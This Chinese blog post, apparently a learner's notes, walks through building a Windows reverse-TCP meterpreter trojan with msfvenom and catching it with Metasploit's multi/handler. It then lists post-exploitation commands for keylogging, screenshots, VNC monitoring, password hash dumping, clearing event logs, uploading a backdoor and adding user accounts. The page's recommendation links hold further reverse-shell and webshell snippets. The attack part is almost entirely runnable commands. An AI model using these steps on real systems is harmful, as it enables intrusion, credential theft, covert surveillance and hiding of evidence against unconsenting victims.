Metasploit 生成反弹连接木马

最新推荐文章于 2024-05-13 14:29:04 发布
最新推荐文章于 2024-05-13 14:29:04 发布
阅读量1.3k 收藏 6
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26002283/article/details/105243589
版权

“注 本文为笔者学习过程中记录”

Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe
生成一个名为 test.exe 的木马文件到msf目录下

Step2: 通过 msfconsole 命令进入metasploit :
Step3: Use exploit/multi/handler 进入到监听模式。
Step4:设置payload反弹 Set payload windows/meterpreter/reverse_tcp
step5: 设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)
Step6:exploit攻击开始(开始监听设置的本地端口)

当靶机运行test文件后,即可在kali 端获取连接。

meterpreter一些常用命令:
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd
cmd下(测试机是windows):

dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码

Hedy kid
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
冰蝎 连接木马反弹shell拿到权限全过程
hackzkaq的博客
11-25 1万+
一.冰蝎简介 什么是冰蝎 “冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
Metasploit-MS10-046Web反弹连接复现
5L2g556F5ZWl77yf
09-08 490
一. 概述 Windows Shell 中的漏洞可能允许远程执行代码 (2286198) 发布时间: 2010年8月2日 | 更新时间: 2010年8月24日 版本: 1.2 详情请查阅下方微软官方文档 概览 中文名:无 微软官方编号:MS10-046 CVE编号:无 类型:远程代码执行 官方评级:严重 影响系统:winxp,win7,winserver03,winserver08r2 二. 复现 攻击机 靶机 IP:192.168.3.70 192
复现|使用Kali生成木马,渗透Windows系统
最新发布
Maricopig的博客
05-13 777
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
Metasploit实验:android内网的反弹控制
wjwqp的专栏
04-11 480
一。测试环境: 实验环境:kali下Metasploit,kali无线网络环境1(外网180.91.xx.xx,内网:192.168.0.XX): 安卓手机:oppo R17.无线网络环境2(外网180.80.xx.xx,内网:192.168.1.XX): 思路:制作payload,攻击,映射端口 二、准备:一个ngrok帐号。 2.1没有可以去注册:htt...
使用Metasploit web_delivery 反弹shell
大方子
02-07 5376
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
利用Metasploit获取linux反弹shell的尝试
weixin_42324313的博客
08-19 9643
序 接《Metasploit上使用RPC方式复现一个Linux提权漏洞》。 由于刚刚入手,对很多概念和技术不慎了解,对RPC,mfsd,反弹shell等技术的理解有限,甚至有所偏差,导致前面做的探索差强人意。虽然最后建立了攻击机与靶机之间的连接,并且拿到shell和root权限,但是不能算是真正意义上的Metasploit上使用RPC方式复现一个Linux提权漏洞。 还需要继续进行探索,具体什么...
什么是木马反弹木马
ciahi的专栏
09-02 5073
什么是木马?特洛伊木马(以下简称木马),英文叫做“  Trojan house”  ,其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“  马”  兴叹。 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
Metasploit渗透测试指南.修订版
09-12
Metasploit渗透测试指南》是一本专注于网络安全领域的重要书籍,尤其对于那些希望深入了解和运用Metasploit框架进行渗透测试的专业人士来说,它提供了一条深入理解与实践的路径。Metasploit是一款强大的开源安全...
metasploit-framework-6.3.34.zip
09-17
2. 社会工程学工具:Metasploit还包含了社会工程学工具,如钓鱼邮件生成器,用于模拟真实世界的攻击场景,测试用户的安全意识。 3. 反取证:框架内的反取证模块可以帮助研究人员了解攻击者可能采取的隐藏手段,以...
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
kali监听win2008;反弹shell;msf生成木马;留后门;权限维持;
xiaochenhang的博客
08-30 1199
2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;4、kali使用msfconsole工具进行渗透。注意abcd.exe路径;在计算机管理里面可以看见。...
kali生成木马
Massimo__JAVA的博客
04-25 2009
攻击机:kali 192.168.116.128受害机:win7 192.168.116.124目标:使用kali。
反弹shell---生成木马反弹shell(Windows)
weixin_50956890的博客
05-04 4178
Windows反弹shell的一种方式--生成木马
Kali渗透测试:使用Armitage针对漏洞进行攻击
Liu_Bruce的博客
05-17 1717
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例(“永恒之蓝”)经典的漏洞,单击这个模块以后就可以开始攻击了。 实 验 环 境 攻击机:Linux kali 5.10.0. IP : 192.168.68.125 靶机: Win2008 IP: 192.168.68.205 实 验 步 骤 1. 在工作区搜索ms17_010模块 打开Armitage,搜索ms17_010模块,如下图所示: 2. 选中ms17_010_eternablu
Linux计划任务执行msf木马,Metasploit生成木马文件获取shell和UAC提权操作
weixin_42297349的博客
05-16 918
前言攻击环境获取shellUAC提权一. 前言前段时间有做过一次内核提权的尝试,不过没有成功,主要还是权限控制的比较严格,并且该打的补丁都打了。但是方法还是有用的,还有就是思路流程总结一下。二. 攻击环境攻击机:kali Linux 2019.1 IP:192.168.28.156靶机:Windows7 ultimate sp1 IP:192.168.28.138三. 获取shell3.1 生成木...
利用metasploit生成反弹shell程序,实现远程控制
qq_33163046的博客
08-20 3910
Metasploit生成反弹shell实现远程控制的方法具有高度定制化、多平台支持、强大的漏洞利用能力、无需事先安装恶意软件以及高度灵活和可扩展等优点。这使得用户能够根据具体需求和目标系统的特点,实现精确、有效和隐蔽的远程控制。
Metasploit和Cobalt Strike生成木马的过程
03-25
步骤1:启动Metasploit控制台并选择木马生成模块 Metasploit控制台提供了各种服务和模块,可以生成不同类型的木马程序。要使用Metasploit生成木马,需要首先启动控制台,然后选择木马生成模块。可以使用“msfconsole...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值